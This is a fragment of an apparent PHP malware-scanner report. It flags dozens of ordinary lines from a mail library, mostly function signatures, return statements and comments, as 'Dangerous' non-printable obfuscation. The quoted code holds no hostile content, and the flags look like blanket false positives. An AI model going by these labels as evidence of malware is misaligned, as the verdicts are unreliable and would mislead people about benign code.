<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
